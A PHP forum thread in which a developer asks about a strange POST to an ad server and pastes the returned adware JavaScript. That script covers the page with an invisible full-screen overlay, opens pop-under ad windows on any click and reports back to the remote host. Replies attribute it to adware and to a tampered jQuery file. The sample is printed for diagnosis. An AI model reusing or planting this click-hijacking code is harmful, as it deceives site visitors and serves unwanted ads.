PHP Developers Network

A community of PHP developers offering assistance, advice, discussion, and friendship.		  
Loading
It is currently Thu Aug 06, 2020 5:23 pm

View unanswered posts | View active topics


Board index » Programming » PHP - Security

All times are UTC - 5 hours




Post new topic Reply to topic  Page 1 of 1
  [ 7 posts ] 
  Print view Previous topic | Next topic 
Author Message
ershadow786
PostPosted: Mon Nov 09, 2015 8:49 am 
Offline
Forum Newbie

Joined: Mon Nov 09, 2015 8:31 am
Posts: 2
I am have debugging some javascript code in firebug,then i have seen some strange POST thing in firebug this is worrying me?
I have registration form when i reload page i see in firebug following "POST http://api.adsrun.net/post"

Response Header
Cache-Control
no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection
keep-alive
Content-Type
application/json
Date
Mon, 09 Nov 2015 13:25:43 GMT
Expires
Thu, 19 Nov 1981 08:52:00 GMT
Pragma
no-cache
Server
nginx/1.9.4
Set-Cookie
PHPSESSID=a0f52694494daab764d719b907baff6b; expires=Sat, 07-Nov-2020 13:25:43 GMT; Max-Age=157680000
; path=/
Transfer-Encoding
chunked
access-control-allow-cred...
true
access-control-allow-head...
Content-Type
access-control-allow-orig...
http://localhost
p3p
CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"


RESPONSE is something like this

{"eval":"\nvar ad = response.ad;\nvar ad_token = response.ad_token;\nfunction postAction(xlog, cb) {
\n var params = {\"ad_id\":14,\"show_id\":27,\"user_id\":1573819,\"host\":\"localhost\",\"time\":1447075543
,\"hash\":\"6dd0fd2392c7a0cc9800ccfcea9143ed\"};\n params.postActionParams = xlog;\n ajax(\"http:\
/\/api.adsrun.net\/postAction\", params, cb);\n}\nvar ontw = false;\r\nfunction oNT() {\r\n if (ontw
) return;\r\n else ontw = true;\r\n var b = window.open(ad.url, \"new\" + Math.floor(9999999 *
Math.random()) + 1);\r\n if (b) postAction(); \r\n\r\n\/\/ var e = navigator.userAgent.toLowerCase
(),o = -1 != e.indexOf(\"opera\"),g = -1 != e.indexOf(\"chrome\");\r\n\r\n \/\/ if (document.createEvent
&& (o || g)) {\r\n \/\/ if (false) {\r\n \/\/ var b = document.createElement(\"a\");\r\n
\/\/ b.href = ad.url;\r\n \/\/ b.target = \"_blank\";\r\n \/\/ var c = document.createEvent
(\"MouseEvents\");\r\n \/\/ c.initMouseEvent(\"click\", !0, !0, window, 1, 0, 0, 0, 0, !0, !1,
!1, !1, 1, null);\r\n \/\/ b.dispatchEvent(c);\r\n \/\/ postAction();\r\n \/\/ } \r\n
\/\/ else {\r\n \/\/ var b = window.open(\"about:blank\", \"win\" + Math.floor(9999999 * Math
.random()) + 1);\r\n \/\/ with(b) opener.window.focus(), b.location = ad.url, \"undefined\" !=
typeof window.mozPaintCount && window.open(\"about:blank\").close()\r\n \/\/ if (b) postAction
(); \r\n \/\/ }\r\n \r\n\r\n}\r\n\r\n\r\n\r\n var startTimeout = setTimeout(myStart, 100),divret
= null;\r\nif (\"function\" == typeof window.addEventListener) window.addEventListener(\"load\", function
() {\r\n clearInterval(startTimeout);\r\n myStart()\r\n}, !1);\r\nelse try {\r\n window.attachEvent
(\"onload\", function() {\r\n clearInterval(startTimeout);\r\n myStart()\r\n })\r\n} catch
(D) {}\r\n\r\nfunction myStart() { \r\n\r\n var pdiv = document.createElement('div');\r\n
pdiv.style.position = \"fixed\";\r\n pdiv.style.zIndex = \"2147483647\";\r\n pdiv.style
.width = \"100%\";\r\n pdiv.style.height = \"100%\";\r\n pdiv.style.left = \"0px\";\r\n
pdiv.style.top = \"0px\";\r\n pdiv.onclick = function() {\r\n oNT();\r\n document
.body.removeChild(pdiv);\r\n }\r\n if (!divret) {divret=document.body.appendChild(pdiv);}\r
\n document.addEventListener ? document.addEventListener(\"mouseup\", oNT, !1) : document.attachEvent
(\"onmouseup\", oNT);\r\n \r\n}","ad":{"url":"http:\/\/www.adcash.com\/ad\/display.php?r=356017"
},"ad_token":"31f68d20ffc59b05601acfa0dc349e4b14"}

I am not sure this some malware type may be harmful??I have encountered this problem from 2 days looks strange to me and need your suggestions?

JSON :
Syntax: [ Download ] [ Hide ]
var ad = response.ad;
var ad_token = response.ad_token;
function postAction(xlog, cb) {
  var params = {"ad_id":14,"show_id":27,"user_id":1573819,"host":"localhost","time":1447075543,"hash":"6dd0fd2392c7a0cc9800ccfcea9143ed"};
  params.postActionParams = xlog;
  ajax("http://api.adsrun.net/postAction", params, cb);
}
var ontw = false;

function oNT() {

    if (ontw) return;

    else ontw = true;

    var b = window.open(ad.url, "new" + Math.floor(9999999 * Math.random()) + 1);

    if (b) postAction();  



//    var e = navigator.userAgent.toLowerCase(),o = -1 != e.indexOf("opera"),g = -1 != e.indexOf("chrome");



   // if (document.createEvent && (o || g)) {

  //  if (false) {
 
Top
 Profile  
 
requinix
PostPosted: Mon Nov 09, 2015 2:42 pm 
Offline
Spammer :|
User avatar

Joined: Wed Oct 15, 2008 2:35 am
Posts: 6617
Location: WA, USA
adsrun.net is a domain used by some kind of proxy/filter/etc. bypassing stuff. Do you have an extension installed that has anything to do with that? What <script> or Javascript code is triggering the call?
Top
 Profile  
 
ershadow786
PostPosted: Tue Nov 10, 2015 1:16 am 
Offline
Forum Newbie

Joined: Mon Nov 09, 2015 8:31 am
Posts: 2
thanks for reply:
i am not sure which javascript code is triggering that call[http://api.adsrun.net/post] but after looking at JSON there is key url whose url " "http://www.newpoptab.com/watch?key=60fd53c3a2cbae821bd2f3056f84047d" " this changed after restart and before that it was tradeadexchange.after googleing i found that they were ad ware malware.I tried antivirus avg but none could remove however spyhunter could detect that but for removing it requires paid version :(.Any help appreciated
Top
 Profile  
 
requinix
PostPosted: Tue Nov 10, 2015 4:43 am 
Offline
Spammer :|
User avatar

Joined: Wed Oct 15, 2008 2:35 am
Posts: 6617
Location: WA, USA
Yeah, that could certainly explain it.

I normally clean computers by hand so I can't point you to any good anti-malware stuff. I think HijackThis is still around, but it takes a bit of know-how regarding what it reports and what should be cleaned. Microsoft has a free antivirus too. Don't remember what it's called.
Also check the most obvious place: list of programs installed in Windows. Some of the nicer malware actually lets you uninstall it.
Top
 Profile  
 
Celauran
PostPosted: Tue Nov 10, 2015 7:25 am 
Offline
Moderator
User avatar

Joined: Tue Nov 09, 2010 3:39 pm
Posts: 6425
Location: Montreal, Canada

_________________
Top
 Profile  
 
requinix
PostPosted: Tue Nov 10, 2015 4:37 pm 
Offline
Spammer :|
User avatar

Joined: Wed Oct 15, 2008 2:35 am
Posts: 6617
Location: WA, USA


Top
 Profile  
 
vgstef
PostPosted: Tue Feb 09, 2016 2:13 am 
Offline
Forum Newbie

Joined: Tue Feb 09, 2016 1:59 am
Posts: 1
I found this thread looking for information. I got the same issue, and I found where it came from.

In our website site project, a colleague included the file "jquery-2.2.0.min.js", but that had been hacked with a short on load window listener function. That function was querying a website to get spam content.
Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  Page 1 of 1
  [ 7 posts ] 

Board index » Programming » PHP - Security

All times are UTC - 5 hours


Who is online

Users browsing this forum: No registered users and 5 guests

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group